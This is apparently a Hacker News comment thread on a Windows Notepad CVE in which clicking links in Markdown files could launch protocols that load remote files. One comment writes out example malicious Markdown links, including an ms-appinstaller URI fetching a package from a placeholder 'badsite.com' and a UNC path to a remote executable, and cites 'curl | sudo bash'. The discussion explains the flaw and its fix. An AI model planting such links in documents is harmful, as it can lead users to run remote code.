← Back to context

Comment by procaryote

1 day ago

Markdown is readable as plain text, that's kind of the point of it

There's also a pretty large jump between "I can ask the system to open this link in the default browser" and "I have built my own link handling in a memory-unsafe language to support some really fringe features, and oops it's exploitable"

4 comments

procaryote

Reply
NetMageSCW  21 hours ago

Except memory-unsafe and fringe features have nothing to do with this CVE, which seems incredibly dumb on the face of it.

Replace Notepad with Chrome or Edge - clicking on a link downloads content from the Internet! Oh noes!

  • paleotrope  8 hours ago

    I haven't had time to look at it in detail but surely the vulnerability is more than a "click a URL".

    • amiga386  7 hours ago

      No, that's exactly what the vulnerability is as far as I know.

      "An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files." https://msrc.microsoft.com/update-guide/vulnerability/CVE-20...

      Imagine some Markdown:

          [link](https://badsite.com)
    [link](file://C:/windows/system32/cmd.exe)
    [link](file://\\1.2.3.4\share\foo.exe)
    [link](ms-appinstaller://?source=https://badsite.com/bad.appx)

      Wordpad, Notepad++ and many others highlight and let you double-click the URL in the first three lines, and yes they use the shell to open cmd.exe, yes they open remote shares (which if they're properly remote, the shell throws up a warning prompt asking if you want to connect). Wordpad always prompts if you want to open the link (and shows the link) before doing it, but you can click "Yes".

      What's beyond the pale is that MS's new Notepad highlighted custom URIs like the fourth link, and let you click to open it without a prompt. Even web browsers will prompt at least once with a special modal dialogue, the first time you click on a link to a custom URI. For safety, a text editor should stick to highlighting http/https/file URIs only.

      That's the "RCE", in the same way that telling a Linux user to type "curl | sudo bash" in their shell is "RCE".

      The fix is that clicking the link now gives a dialogue box asking if you really want to click it, and remember to click no if you're not sure.

      1 reply →